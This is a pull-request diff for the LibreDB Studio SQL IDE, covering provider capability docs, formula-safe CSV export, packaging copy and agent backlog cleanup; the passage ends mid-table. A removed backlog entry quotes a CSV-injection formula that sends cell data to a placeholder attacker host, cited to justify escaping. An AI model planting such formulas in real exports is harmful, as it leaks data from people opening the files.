### PR TITLE
fix(providers): eight engines showed BEGIN and got HTTP 400, plus six more

### DIFF
--- a/deploy/rancher/CATALOG_LISTING.md
+++ b/deploy/rancher/CATALOG_LISTING.md
@@ -45,13 +45,15 @@ partner contact.
 > byte-identical — run `bun run chart:bump` rather than editing
 > `operator/helm-charts/libredb-studio/` by hand, or the sync guard fails the required check.
 >
-> What *is* release-coupled is every marketplace and packaging description that spells the
-> count: `deploy/azure`, `deploy/railway`, `deploy/caprover`, `packaging/winget`,
-> `packaging/chocolatey`, `packaging/homebrew` and `desktop/src-tauri/tauri.conf.json` all
-> still say thirteen, because each describes an artifact a user can already download and
-> 0.12.0 ships no Cassandra provider. Read the number from `SHIPPED` when a tag carries it.
-> (`packaging/linux/nfpm.yaml` and the operator CSVs are the exception: both are consumed at
-> release time from `main`, so they name fourteen now and the next tag publishes it.)
+> What *is* release-coupled is every marketplace description that spells the count:
+> `deploy/azure`, `deploy/railway` and `deploy/caprover` still say thirteen, because each
+> describes an artifact a user can already download and 0.12.0 ships no Cassandra provider.
+> Read the number from `SHIPPED` when a tag carries it. Two groups are no longer in that set.
+> `packaging/winget`, `packaging/chocolatey`, `packaging/homebrew` and
+> `desktop/src-tauri/tauri.conf.json` now carry **no number at all** - nothing regenerates them
+> from the registry, so any digit in them is stale the day the next engine lands (issue #445).
+> And `packaging/linux/nfpm.yaml` and the operator CSVs are consumed at release time from
+> `main`, so they name fourteen now and the next tag publishes it.
 
 ## Listing facts
 

--- a/desktop/src-tauri/tauri.conf.json
+++ b/desktop/src-tauri/tauri.conf.json
@@ -30,7 +30,7 @@
     "targets": ["appimage", "deb"],
     "category": "DeveloperTool",
     "shortDescription": "The open-source SQL IDE for cloud-native teams",
-    "longDescription": "LibreDB Studio is an open-source SQL IDE for thirteen engines - PostgreSQL, MySQL, SQLite, Oracle, SQL Server, MongoDB, Redis, Couchbase, ClickHouse, Apache Druid, Elasticsearch, OpenSearch and Apache Trino - with AI query assistance. The desktop build runs the same server LibreDB Studio ships everywhere else as a local sidecar and keeps all data on this machine.",
+    "longDescription": "LibreDB Studio is an open-source SQL IDE for PostgreSQL, MySQL, SQLite, Oracle, SQL Server, MongoDB, Redis, Couchbase, ClickHouse, Apache Druid, Elasticsearch, OpenSearch, Apache Trino and Apache Cassandra, with AI query assistance. The desktop build runs the same server LibreDB Studio ships everywhere else as a local sidecar and keeps all data on this machine.",
     "homepage": "https://libredb.org",
     "publisher": "LibreDB",
     "license": "MIT",

--- a/docs/ADDING_A_PROVIDER.md
+++ b/docs/ADDING_A_PROVIDER.md
@@ -558,6 +558,7 @@ If it appears in routes, components, or utilities — you're doing it wrong. Use
 | EXPLAIN | If `supportsExplain: true`, verify EXPLAIN button works |
 | Create Table | If `supportsCreateTable: true`, verify the + button appears |
 | Inline row edit | If `supportsInlineRowEdit: true`, verify the EDIT toggle appears and one edited row runs one statement the engine accepts |
+| Transactions | If `supportsTransactions: true`, verify BEGIN/COMMIT/ROLLBACK and SANDBOX appear in the toolbar and that a BEGIN succeeds; if `false`, verify all four are absent |
 | Maintenance | Open Database Maintenance, verify correct operations show |
 | AI Explain | If `supportsExplain: true`, open Visual EXPLAIN and verify the AI explanation streams |
 | Labels | Check all UI text uses your labels (entity names, actions, etc.) |
@@ -578,6 +579,7 @@ Every field and what it controls:
 | `supportsExternalQueryLimiting` | `boolean` | Whether route applies LIMIT to queries (SQL) or provider handles it (MongoDB) |
 | `supportsCreateTable` | `boolean` | "Create Table" button in SchemaExplorer |
 | `supportsInlineRowEdit` | `boolean?` | Whether the results grid offers inline row editing. `false` hides the EDIT toggle and every editable cell — set it where the engine has no `UPDATE <table> SET <col> = <val> WHERE <pk> = <val>` statement, which is what `use-inline-editing.ts` builds. Optional only because the interface is published and a required addition breaks external implementers; every provider here declares it, and an absent flag reads as unsupported |
+| `supportsTransactions` | `boolean?` | Whether THIS PROVIDER implements the interactive transaction session `POST /api/db/transaction` drives (`beginTransaction`/`commitTransaction`/`rollbackTransaction` over one held connection). `false` withholds the editor toolbar's BEGIN/COMMIT/ROLLBACK trio **and** the SANDBOX toggle, which auto-rolls-back through the same route. It is about the provider's surface, not the engine: SQLite has `BEGIN` and still declares `false`. Optional for the published-interface reason above; the UI gates on `=== true`, so an absent flag and an unresolved metadata fetch both read as no transactions (`docs/BACKLOG.md` U13) |
 | `declaresForeignKeys` | `boolean?` | Whether this engine has foreign keys in its model at all. `false` says an empty `TableSchema.foreignKeys` means "no such constraint exists here", not "this schema declares none" — set it on every engine without referential constraints. Optional for the published-interface reason above; consumers gate on `=== false`, so an absent flag reads as "may declare them" |
 | `tablesAreDerivedGroupings` | `boolean?` | Whether `getSchema()`'s rows are objects the engine holds, or groupings this server derived from a bounded scan. `true` on Redis and LibreDB only. Where it is true the schema explorer hides every menu item that *addresses* the row — `Profile Table`, `Generate Test Data`, and both per-row maintenance items, all of which name the row to a route that needs a real object — and keeps the ones that merely name it (`Select`, `Generate`, `Copy Name`, `Generate Code`). The agent layer states it to a plan run in one sentence. Consumers gate on `=== true`, so an absent flag reads as "ordinary objects" |
 | `supportsMaintenance` | `boolean` | Whether maintenance API accepts requests for this provider |
@@ -608,12 +610,19 @@ comment. Three surfaces read labels today, plus the agent's prompt layer:
 | `vacuumGlobalLabel` | Admin Operations tab, vacuum card's button text ("Run Vacuum") |
 | `vacuumGlobalTitle` | Admin Operations tab, vacuum card title ("Reclaim Space") |
 | `vacuumGlobalDesc` | Admin Operations tab, vacuum card description paragraph |
+| `reindexGlobalLabel` (optional) | Admin Operations tab, reindex card's button text. Absent = the hardcoded *"Run Reindex"* |
+| `reindexGlobalTitle` (optional) | Admin Operations tab, reindex card title. Absent = the hardcoded *"Rebuild Indexes"* |
+| `reindexGlobalDesc` (optional) | Admin Operations tab, reindex card description paragraph. Absent = the hardcoded *"Reconstructs all indexes in the database."* Declare the triad wherever that sentence is false — on Couchbase `reindex` is a deferred-GSI `BUILD INDEX`, not a table reindex (`docs/BACKLOG.md` U6) |
 | `statementLanguage` (optional) | The agent's plan contract (`src/lib/agent/investigation.ts`), stated verbatim to the model. No UI surface reads it. Declared only where the engine's own name misleads a model about what a "statement" is here |
 | `slowQueriesEmptyState` (optional) | Monitoring **Queries** tab, the "Slowest Queries" empty state. Absent = PostgreSQL's *"Enable pg_stat_statements extension to see query stats."*, which is what the component hardcoded for every engine until `docs/BACKLOG.md` U12. Declare it wherever that sentence is false, and the panel drops the `pg_stat_statements required` badge as well |
 
 The `*Global*` triads reach only the card, never the per-table button, and only where the card
-renders: the analyze card is gated on `analyze`, the vacuum card on the **literal** `vacuum`. There
-is no `reindexGlobal*` triad; that card is still hardcoded (`docs/BACKLOG.md` U6).
+renders: the analyze card is gated on `analyze`, the vacuum card on the **literal** `vacuum`, the
+reindex card on `reindex`. The `reindexGlobal*` triad is **optional** while the other two are
+required, because `ProviderLabels` is published (`src/exports/types.ts`) and a required field added
+after the fact stops every external implementer compiling; only the three providers that declare the
+`reindex` operation (Postgres, SQLite, Couchbase) set it, and the card keeps its old strings as the
+fallback.
 
 ### PreparedQuery
 

--- a/docs/AGENT.md
+++ b/docs/AGENT.md
@@ -1400,6 +1400,23 @@ column and carries no constraint identity, so nothing downstream can group them 
 line that names the columns and says the pairing is unknown), and the block is bounded in **characters**, because a
 count of edges is not a bound on a prompt.
 
+**An empty relations read is three facts, and the block says which one it has**
+(`er-diagram.ts`). A zero-row read cannot tell a schema that declares no foreign key from a role that
+cannot see the ones it declares, and a run that treats those as the same thing states a falsehood
+with a citation attached: measured on the seeded dvdrental, the `SELECT`-only role
+[`docs/AGENT_DEMO.md`](./AGENT_DEMO.md) prescribes read 0 rows where `pg_constraint` holds 18, and an
+investigation answered "there are no declared foreign key constraints between tables in the
+database" — cited, confident and wrong. The read is fixed at its source (`composePostgresRelations`
+reads `pg_constraint`, which needs only `USAGE` on the schema), and that fix does not settle the
+general case, since any role can be narrower than its database. So the block distinguishes three
+cases: an engine with no such construct is told nothing could have been found (from
+`ProviderCapabilities.declaresForeignKeys`, never from the connection's type); a read that returned
+rows gets the rows; and a read that returned none on an engine that has them is told what was not
+seen — the limit of the reading, plus an instruction not to report that this database has no foreign
+keys and to treat any join the run relies on as inferred from names rather than declared. It is the
+same rule the inventory's omission notice follows: what was not read is said, because silence gets
+read as absence.
+
 ## What bounds a run
 
 The frozen execution policies (`AGENT_WORKFLOW_BUDGETS` in `src/lib/agent/execution-policy.ts`) are
@@ -2286,12 +2303,13 @@ the role's own grants are the whole boundary (A3).
 - **B34** — a hydrated result cannot be exported: the Export menu serializes the tab's own rows, so it
   is hidden while a run's result is shown.
 
-The next six were found by driving the product against a live model in a browser, which is the only
-way any of them could have been found: every one of them passes every gate. The one after them was
-found later, by another route, and is listed here because it is the same kind of thing — a defect
-no gate in this repository objects to. The last three came from repeating that exercise against the
-inference surface (#407) — twenty-six runs over `docs/AGENT_DEMO.md`, which is also where the
-classifier's real-world agreement rate was measured — and they are the same kind of thing again.
+The entries below were found by driving the product against a live model in a browser, which is the
+only way any of them could have been found: every one of them passes every gate. A few were found
+later and by other routes, and are listed here because they are the same kind of thing — a defect no
+gate in this repository objects to. Several came from repeating that exercise against the inference
+surface (#407) — twenty-six runs over `docs/AGENT_DEMO.md`, which is also where the classifier's
+real-world agreement rate was measured. The count is deliberately not stated: entries leave this list
+as they are fixed, and a numeral here goes stale silently.
 
 - **B36** — a follow-up question is answered as if it were the first. Runs carry no memory of each
   other, and neither the surface nor the model says so — the model picks a plausible referent and
@@ -2305,16 +2323,6 @@ classifier's real-world agreement rate was measured — and they are the same ki
 - **B39** — a data-analysis run has no honest way to conclude that the question is not about this
   database. Its only route to `answered` is a reading of the data, so a run that establishes the
   question is unanswerable fabricates one — the #356 shape again, in a new place.
-- **B44** (second half) — an empty relations read still licenses the negative. The read itself is
-  fixed: it went through the `information_schema` constraint views, which PostgreSQL restricts to
-  constraints on tables the role owns or holds a privilege other than `SELECT` on, so the
-  `SELECT`-only role this repository's own demo script prescribes read an empty graph — measured on
-  the seeded dvdrental as 0 rows where `pg_constraint` holds 18 — and an investigation answered "there
-  are no declared foreign key constraints between tables in the database", confidently, citing a
-  snapshot that genuinely contained nothing. `composePostgresRelations` now reads `pg_constraint`,
-  which needs only `USAGE` on the schema, and that role reads all 18. What stands is the half the
-  rewrite cannot reach: a zero-row read cannot tell "none exist" from "none visible to this role", any
-  role can be narrower than the database, and nothing makes a run say which it means.
 - **B45** — every query-optimization run is scored `unanswered / empty-evidence`, including one that
   compared two plans, priced both and wrote the correct `CREATE INDEX`. A `sql.explain.estimate`
   artifact records `rowCount: 0` because a plan arrives in a single column, and

--- a/docs/AGENT_DATA_FLOW.md
+++ b/docs/AGENT_DATA_FLOW.md
@@ -579,7 +579,7 @@ fences what it sends:
 | Visual EXPLAIN's AI explanation | `POST /api/ai/explain` | `query`, `explainPlan`, `schemaContext`, `databaseType` | `src/components/VisualExplain.tsx:486-497` |
 | Query safety dialog | `POST /api/ai/query-safety` | `query`, a filtered `schemaContext`, `databaseType` | `src/components/QuerySafetyDialog.tsx:167-171` |
 | Database documentation | `POST /api/ai/describe-schema` | A schema string built from table names, row counts and column definitions | `src/components/DatabaseDocs.tsx:61-68` |
-| Data Profiler's AI summary | `POST /api/ai/describe-schema` | Per column: null percent, distinct count, **`min=` and `max=`** | `src/components/DataProfiler.tsx:117-142` |
+| Data Profiler's AI summary | `POST /api/ai/describe-schema` | Per column: null percent, distinct count, **`min=` and `max=`** | `src/components/DataProfiler.tsx:148-173` |
 
 **That last row is the one to read carefully.** `/api/db/profile` computes `MIN(col::text)` and
 `MAX(col::text)` per column (`src/app/api/db/profile/route.ts:96-97`), and the Data Profiler puts

--- a/docs/AGENT_DEMO.md
+++ b/docs/AGENT_DEMO.md
@@ -188,10 +188,12 @@ than* `SELECT`. The relations read went through those views, so under exactly th
 above the graph was empty and case 1 answered *"There are no declared foreign key constraints between
 tables in the database"*, citing a snapshot that genuinely contained nothing. `composePostgresRelations`
 (`src/lib/agent/composed-sql.ts`) now reads `pg_constraint`, which asks only for `USAGE` on the schema,
-and answers all 18 rows as this role. What is still true and still worth not overclaiming: an EMPTY
+and answers all 18 rows as this role. What is still true and cannot be fixed by any read: an EMPTY
 relations read cannot tell "this database declares none" from "this role cannot see the ones it
-declares", and nothing yet makes a run say which it means (backlog **B44**, second half). So a run on a
-database that really has no foreign keys will still say so as if it had checked.
+declares". So the run is no longer allowed to choose — the relations block now states the limit of
+what it read and tells the model not to report that the database has no foreign keys. A database that
+really declares none is described the same way — as a graph this run cannot vouch for — which is the
+price of not stating the negative, and the cheaper of the two errors.
 
 **Run it from a production build** (`bun run build` then `bun run start`). In development React needs
 `eval`, which the CSP does not allow, so the login page does not hydrate (`docs/BACKLOG.md` B40).
@@ -235,7 +237,8 @@ have had to reconstruct from an ER diagram.
 Know why it worked, because it is not the reason it looks like. Under the documented role the
 relations graph handed to this run was **empty** (case 1), and the model reconstructed the path from
 column names alone. It got it right. It got it right *without* the evidence it was supposed to have,
-which is a good demo and a bad guarantee — one more reason B44 matters.
+which is a good demo and a bad guarantee: the run is now told to treat exactly this kind of join as
+inferred from names rather than declared.
 
 ### 3. Write me the query
 **Agent ·** `Write me a query for the ten highest-paid employees with their department name.` *(opens as Analyze, not Investigate)*
@@ -711,7 +714,8 @@ cannot assert something and leave you to trust it.
 
 And say the limit of that guarantee, because case 1 is standing right there: a citation proves the
 claim rests on something the run *read*. It does not prove the read was complete. An empty relations
-read is honestly cited and still supports a false negative (B44).
+read is honestly cited and would support a false negative, which is why the relations block refuses to
+state one.
 
 ---
 
@@ -741,7 +745,8 @@ in that result or it is refused. An answer must be a result of a query the run a
 or a profile cannot be presented as one. The verdict at the end of a run is computed from the run's
 ledger, not from the model's opinion of its own work. The counter-example is honest and worth
 volunteering: a citation binds a claim to what the run read, and cannot tell it that what it read was
-incomplete (B44).
+incomplete — so where the incompleteness is known in advance, as with an empty relations read, the
+grounding says so in words.
 
 **"Which databases?"** See the table at the top, and its #414 note. The short version: Operate works
 everywhere and was driven live on six engines including Redis, which has no SQL at all; the four SQL
@@ -763,7 +768,6 @@ would close it, so "not yet" means deferred with a reason, not overlooked.
 
 | Not yet | What happens today | Waiting on |
 | --- | --- | --- |
-| **Foreign keys under a least-privilege role** | The relations read comes back empty and the run reports that no foreign keys exist — a false negative it cannot tell apart from a true one | B44 — reading `pg_constraint` instead of the `information_schema` views, and declining to assert the negative from an empty read |
 | **A verdict that fits an optimization run** | Every Optimize run ends `unanswered`, however good its plans and index recommendation were | B45 — a plan artifact is not an empty result, the same exemption the Operate template already has |
 | **Follow-up questions** | Each run starts fresh, and neither the surface nor the model says so — ask "and how many of those?" and you get a confident answer to a different question | B36 — either carrying the previous run's objective and report into the next as fenced context, or run history |
 | **Causal questions** — "why are sales down?" | Answered from the schema alone, which cannot know which decomposition of a metric is the business one | A per-connection business note, held server-side; sketched in `docs/AGENT_ANALYST_DESIGN.md` §5 |

--- a/docs/BACKLOG.md
+++ b/docs/BACKLOG.md
@@ -28,7 +28,7 @@ None of it is a GitHub issue.
 - [Studio UI and query execution](#studio-ui-and-query-execution) — X2–X7, U2–U18 · 9
 - [Authentication and security headers](#authentication-and-security-headers) — AU2
 - [Tests](#tests) — T1–T3 · 2
-- [Dependencies](#dependencies) — P1–P6 · 6
+- [Dependencies](#dependencies) — P1–P5 · 5
 - [Documentation](#documentation) — DOC1–DOC3 · 3
 - [Release pipeline](#release-pipeline) — REL1
 - [Chart configuration surface](#chart-configuration-surface) — N1–N3 · 3
@@ -870,29 +870,6 @@ so in `CLAUDE.md`, which today says nothing about it, or sweep the orphans and t
 `calendar.tsx` went. Until then every Dependabot major on one of those packages costs a review for a
 component nothing renders. Reproduce the list with a per-file importer count over `src/components/ui/`.
 
-### P6. Twenty-one lucide icon imports survive only through legacy-rename aliases
-
-The lucide-react 1.31 bump found this and did not fix it. These names were renamed upstream and are
-re-exported under their old spelling, at runtime and in the types: `AlertTriangle`, `Loader2`,
-`Loader2Icon`, `CheckCircle2`, `BarChart3`, `BarChart2`, `AlertCircle`, `FileJson`, `XCircle`,
-`AlignLeft`, `Edit3`, `Filter`, `Wand2`, `MoreVertical`, `MoreHorizontal`, `MoreHorizontalIcon`,
-`History`, `PlayCircle`, `LineChart`, `PieChart`, `AreaChart` — 51 import sites. Geometry is
-byte-identical to what we rendered before, so nothing is broken today.
-
-The failure mode is what makes it worth recording. lucide-react 1.31.0 ships **zero** `@deprecated`
-JSDoc tags, so no editor, linter or typecheck warns while an alias is alive. The first signal is the
-build breaking on the release that drops it. That is exactly how `Github` arrived — a hard break, not a
-warning.
-
-`History` is the one with a rendered-output consequence: in v1 it aliases `RotateCcwClock`, and
-`createLucideIcon` derives the emitted class from the canonical name, so its element class moves from
-`lucide-history` to `lucide-rotate-ccw-clock`. No test asserts that class today (checked all 17
-`lucide-*` class literals under `src/` and `tests/`), but a migration should re-check it.
-
-**Done when:** each import uses its canonical v1 name (`TriangleAlert`, `LoaderCircle`, `CircleCheck`,
-`ChartColumn`, …), which turns a future silent removal into a no-op.
-
----
 
 ## Documentation
 

--- a/docs/BACKLOG.md
+++ b/docs/BACKLOG.md
@@ -19,30 +19,24 @@ None of it is a GitHub issue.
 
 ---
 
----
-
----
-
----
-
 **Sections**
 
 - [SQL statement reading](#sql-statement-reading) — S1–S8 · 8
-- [Drivers and connections](#drivers-and-connections) — D1–D10, U17 · 10
+- [Drivers and connections](#drivers-and-connections) — D1–D11, U17 · 11
 - [Value interpolation](#value-interpolation) — V1
 - [Row editing](#row-editing) — R1
-- [Studio UI and query execution](#studio-ui-and-query-execution) — X1–X7, U2–U18 · 13
+- [Studio UI and query execution](#studio-ui-and-query-execution) — X2–X7, U2–U18 · 9
 - [Authentication and security headers](#authentication-and-security-headers) — AU2
 - [Tests](#tests) — T1–T3 · 2
 - [Dependencies](#dependencies) — P1–P6 · 6
-- [Documentation](#documentation) — DOC1–DOC4 · 4
+- [Documentation](#documentation) — DOC1–DOC3 · 3
 - [Release pipeline](#release-pipeline) — REL1
 - [Chart configuration surface](#chart-configuration-surface) — N1–N3 · 3
 - [Security Phase 1 deferrals](#security-phase-1-deferrals) — H1–H13 · 10
 - [Security Phase 2 deferrals](#security-phase-2-deferrals) — C2–C10 · 9
 - [Security Phase 3 deferrals](#security-phase-3-deferrals) — K2–K4 · 2
 - [Agent M1 deferrals (#328)](#agent-m1-deferrals-328) — A1–A6 · 5
-- [Agent M2 deferrals (#329)](#agent-m2-deferrals-329) — B1–B56 · 39
+- [Agent M2 deferrals (#329)](#agent-m2-deferrals-329) — B1–B56 · 38
 
 ---
 
@@ -483,33 +477,8 @@ puts it in the storage secret walk in `src/lib/storage/connection-secrets.ts`.
 **Done when:** a tunnel verifies the bastion's host key against something the connection carries, an
 unverifiable key fails the connection with an error naming the fingerprint it saw, and the chosen
 first-contact policy is written in `docs/providers/`-adjacent documentation the dialog can point to.
+
 ---
-
-### D11. The SSH tunnel accepts any host key it is offered
-
-`createSSHTunnel` (`src/lib/ssh/tunnel.ts`) builds `connectOptions` from host, port, username and
-one of password or private key, and passes no `hostVerifier`. ssh2 has no default: with the callback
-absent the library does not verify the server's key at all, so the tunnel completes against whatever
-answers on that address. Every byte the tunnel carries - the database password among them - is
-readable to anything that can occupy the bastion's address, and nothing in the product ever shows a
-fingerprint the user could have compared.
-
-This is the layer where the check belongs and the only one that can do it: the database driver sees
-`127.0.0.1` and a local port, so its own TLS settings say nothing about who terminated the SSH hop.
-Found while fixing #457 and deliberately kept out of that PR: the fix there is about whether the
-tunnel is opened at all, and a verification policy is a separate decision with a UI consequence.
-
-The open decision is what to do on first contact, since Studio has no known-hosts store: refuse
-unknown keys and require the expected fingerprint to be configured (safe, and unusable until someone
-pastes a fingerprint), or trust-on-first-use pinned per connection (usable, and only as good as the
-first connection was). `SSHTunnelConfig` in `src/lib/types.ts` would carry the pin either way, which
-puts it in the storage secret walk in `src/lib/storage/connection-secrets.ts`.
-
-**Done when:** a tunnel verifies the bastion's host key against something the connection carries, an
-unverifiable key fails the connection with an error naming the fingerprint it saw, and the chosen
-first-contact policy is written in `docs/providers/`-adjacent documentation the dialog can point to.
----
-
 
 ## Value interpolation
 
@@ -556,20 +525,6 @@ goes away in a major, with this work.
 
 `U2` came out of the #384 review. The `X` entries came out of the #422 export review — each was
 named, weighed and left out of that PR, so they are recorded rather than re-derived.
-
-### X1. A CSV cell beginning `=`, `+`, `-` or `@` is a formula to a spreadsheet
-
-`src/lib/export/csv.ts` writes the value it was given, exactly. A cell holding
-`=HYPERLINK("http://attacker/"&A1)` is data in the database and a formula in Excel, LibreOffice and
-Google Sheets. It evaluates when someone who did not write the query opens the file.
-
-The fix is not in doubt (prefix with `'`, or wrap it), but it MUTATES the user's values on the way
-out — the opposite of what every other line in that file does. That is a product decision about which
-of two wrong answers to give, and it wants an owner: a checkbox on the export menu, a setting, or a
-rule the docs state.
-
-**Done when:** a cell a spreadsheet would evaluate cannot be evaluated by opening the file, and the
-choice is stated where the user makes it.
 
 ### X2. An export writes the page the grid holds, not the result the user asked for
 
@@ -662,39 +617,6 @@ file's ratio is not the tree's.
 **Done when:** the scope is widened with the benign sites made explicit, or the decision not to is
 recorded here with the number that justified it.
 
-### U4. The profile modal's error state cannot be dismissed
-
-`DataProfiler` renders the message `/api/db/profile` returned and offers no way out. Escape does not
-close it, and the header's close control is under the error card.
-
-#427 measured this on Redis, where the route answered 400 for every key-prefix row, but the fault is
-not Redis's: any provider whose profile request fails traps the user the same way. #427 hid the menu
-item on providers whose rows are derived groupings, which removes the reachable path without fixing
-the modal.
-
-**Done when:** a failed profile is dismissable by Escape and by the modal's own close control, for
-every provider that can fail it.
-
-### U6. The Reindex card has no per-provider wording, so it still speaks Postgres
-
-`ProviderLabels` carries an `analyzeGlobal*` and a `vacuumGlobal*` triad and no `reindexGlobal` one.
-#427 made the Operations tab render the first two. The reindex card stays hardcoded to *"Run
-Reindex"* / *"Rebuild Indexes"* / *"Reconstructs all indexes in the database."*
-
-Three providers declare `reindex`: Postgres, SQLite and Couchbase. For Couchbase, whose reindex is a
-GSI rebuild rather than a table reindex, that copy is wrong the same way the analyze copy was wrong
-for Redis. Adding the triad was out of scope for #427: it touches `ProviderLabels` and every provider
-that implements it.
-
-A smaller twin sits on the same screen. The per-table Analyze and Vacuum buttons are titled with the
-hardcoded `"Analyze"` and `"Vacuum"`, so MongoDB's *"Validate Collection"*, ClickHouse's *"Table
-Statistics"* and Oracle's *"Rebuild Indexes"* never reach them. Wiring those is entangled with U9 and
-should be done with it.
-
-**Done when:** `reindexGlobalLabel` / `reindexGlobalTitle` / `reindexGlobalDesc` exist, the three
-declaring providers set them, the card renders them with the current strings as fallback, and the
-per-table buttons carry `analyzeAction` / `vacuumAction`.
-
 ### U9. Four providers point `vacuumAction` at something that is not `vacuum`, and MySQL offers one it lacks
 
 Two mismatches, measured while fixing #427 and left alone.
@@ -719,28 +641,18 @@ it names. The target grammar differs even among providers declaring the same `Ma
 Oracle's `optimize` wants an index name, ClickHouse's wants a table, Couchbase's `reindex` wants a
 keyspace.
 
+**A third mismatch, measured 2026-08-23 while giving the Reindex card per-provider wording.** The
+global Reindex card cannot succeed on Couchbase at all, whatever it is titled. `dispatchMaintenance()`
+routes `reindex` — and `analyze`, and `kill` — through `requireTarget()`, while
+`OperationsTab.handleRunMaintenance("reindex")` sends no target, so the card answers *"The reindex
+operation requires a target"*. That change gave the card honest wording and deliberately left the
+behaviour alone, because a global control over a per-keyspace operation is the same shape of mistake
+the reverted mapping was. Either the card names a keyspace or Couchbase should not offer it globally.
+
 **Done when:** each provider declares which operation its `vacuumAction` (and `analyzeAction`) stands
-for *and* what kind of target it takes, both surfaces gate and title from that declaration, and a
-live Oracle run proves the per-table control succeeds rather than returning ORA-01418.
-
-### U13. BEGIN and SANDBOX render on engines that have no transactions
-
-`Studio.tsx` supplies `onBeginTransaction`/`onCommit`/`onRollback` unconditionally, so `QueryToolbar`
-renders the trio — and SANDBOX, which auto-rolls-back through the same route — on every connection.
-`POST /api/db/transaction` then refuses: *"Transaction control is not supported for this database
-type"*. Measured 2026-08-19 on OpenSearch, HTTP 400 for both `begin` and `rollback`. Elasticsearch,
-Druid, Couchbase, MongoDB, Redis, Trino and Cassandra are in the same position.
-
-The toolbar's own doc comment states the rule this breaks — *"A caller that cannot run transactions
-omits all three"* — added by #427 when the embedded shell was showing three dead buttons. The
-standalone shell now does the same thing for a different reason: there is no capability to gate on.
-The server gates on `isTransactionProvider(provider)`, a runtime shape check no client can read, and
-`ProviderCapabilities` has no `supportsTransactions`.
-
-Not folded into #424: the capability has to be added to every provider at once.
-
-**Done when:** a provider declares whether it has transactions, `Studio.tsx` omits the trio and the
-sandbox toggle where it does not, and every provider's doc states its answer.
+for *and* what kind of target it takes, both surfaces gate and title from that declaration, the
+Couchbase Reindex card either carries a target or is withheld, and a live Oracle run proves the
+per-table control succeeds rather than returning ORA-01418.
 
 ### U18. The login hero has no vertical slack left, and the relatives line spends 56px it does not have
 
@@ -1035,29 +947,6 @@ above.
 
 **Done when:** each listing has been resubmitted through its own channel with copy that matches the
 shipped product.
-
----
-### DOC4. Three packaging manifests publish "thirteen engines" against fourteen drivers
-
-Found while sweeping the relatives count for the ScyllaDB row, and left out of that change on purpose:
-it is a different denominator with its own history, and these are package-manager manifests rather
-than the marketplace listings DOC3 covers.
-
-| File | Line | Says |
-| --- | --- | --- |
-| `packaging/chocolatey/libredb-studio.nuspec.tmpl` | 31 | "thirteen engines" |
-| `packaging/homebrew/libredb-studio.rb.tmpl` | 12 | "thirteen engines" |
-| `packaging/winget/LibreDB.Studio.locale.en-US.yaml.tmpl` | 16, 19 | "thirteen engines" |
-
-The count they mean is the external drivers, which is **fourteen** since Cassandra landed
-(`EXTERNAL_DATABASE_TYPES.length` in `src/lib/db/compatibility.ts`). All three are published listing
-copy on live channels, so the wrong number is public rather than internal.
-
-Two things to settle rather than bumping the digit, which is the mistake #445 recorded: whether a
-template nothing regenerates from the registry should carry a count at all, and which denominator the
-listing wants — fourteen drivers, or the named products README.md publishes.
-
-**Done when:** each of the four lines states a number that matches the registry or states no number.
 
 ---
 
@@ -2397,39 +2286,6 @@ database has answered it, and should be able to say so without inventing a query
 
 **Done when:** a data-analysis run can conclude "not answerable here" and be scored `answered` for it,
 with the rule stated in `WORKFLOW_TOOL_RULES` and an eval asserting no fabricated statement is sent.
-
-### B44. The documented least-privilege role sees no foreign key, and the run asserts none exists
-
-Found on 2026-08-17 while re-driving `docs/AGENT_DEMO.md` in a browser. Two halves, and the second is
-the one that reaches a user.
-
-**The read comes back empty.** `composePostgresRelations` reads
-`information_schema.table_constraints` / `key_column_usage` / `constraint_column_usage`. PostgreSQL
-restricts those views to constraints on tables the current role owns or holds a privilege on *other
-than* `SELECT`. So the role `docs/AGENT_DEMO.md` prescribes — `CONNECT`, `USAGE`, `SELECT ON ALL
-TABLES`, `pg_read_all_stats` — sees none of them.
-
-Measured on the seeded dvdrental as `libredb_agent` (`usesuper = f`):
-`information_schema.table_constraints` returns **0** rows with `constraint_type = 'FOREIGN KEY'`, while
-`pg_constraint WHERE contype = 'f'` holds **18**. The relations graph packed into the run's context is
-empty for the exact role the product tells operators to create.
-
-**The run then asserts the negative.** Asked what tables exist and how they relate, an investigation run
-answered *"There are no declared foreign key constraints between tables in the database"* — false, and
-cited to a schema snapshot that genuinely contained nothing. A zero-row relations read cannot
-distinguish "this database declares no foreign keys" from "this role cannot see the ones it declares",
-and nothing today makes the run say which it means. The neighbouring case survived only because the
-model reconstructed the join path from column names, which is luck, not evidence.
-
-The first half is **B8's rewrite arriving for a second reason.** `pg_constraint` is readable by any role
-with `USAGE` on the schema, so that same rewrite closes this too.
-
-The second half is a separate decision and does not go away with the rewrite, since any role can be
-narrower than the database.
-
-**Done when:** a run on a `SELECT`-only role reports this database's foreign keys, **and** an empty
-relations read no longer licenses "there are no foreign keys" — the run either says it could not see them
-or says nothing about them, with a test that pins the distinction.
 
 ### B45. Every optimization run is scored `unanswered`, including one that produced a correct index
 

--- a/docs/FEATURES.md
+++ b/docs/FEATURES.md
@@ -114,6 +114,7 @@
 ### 15. Professional Data Export
 *   **Format Versatility:** Instantly export query result sets to CSV, JSON, SQL `INSERT` statements, or a generated `CREATE TABLE` DDL.
 *   **Developer-Ready:** Clean data output optimized for external analysis, reporting, or database migrations.
+*   **Formula-Safe CSV:** A cell whose value starts with `=`, `+`, `-`, `@`, a tab or a carriage return is written with a leading apostrophe, so a spreadsheet shows it as text instead of evaluating it when the file is opened; this is unconditional and has no setting, and a plain number such as `-12.5` is left exactly as it is.
 
 ### 16. Authentication & Identity Management
 *   **Secure User Onboarding:** Full-featured login/logout flows and session management via Next.js middleware and API routes.

--- a/docs/providers/cassandra.md
+++ b/docs/providers/cassandra.md
@@ -727,6 +727,7 @@ because there are no table statistics to list at all.)
   supportsExternalQueryLimiting: true,
   supportsCreateTable: false,        // the modal cannot emit valid CQL, and a diff cannot derive the partition key (§5.5)
   supportsInlineRowEdit: false,      // one guessed key column is not a CQL primary key (§5.5)
+  supportsTransactions: false,       // CQL has no transaction; BATCH is not one (#U13)
   declaresForeignKeys: false,        // the clause does not exist (§6.2)
   supportsMaintenance: false,        // every operation is a nodetool action (§8)
   maintenanceOperations: [],

--- a/docs/providers/clickhouse.md
+++ b/docs/providers/clickhouse.md
@@ -783,6 +783,7 @@ target names none), so a hostile or oddly-named table cannot break out of the ge
 | `supportsExternalQueryLimiting` | `true` |
 | `supportsCreateTable` | `false` |
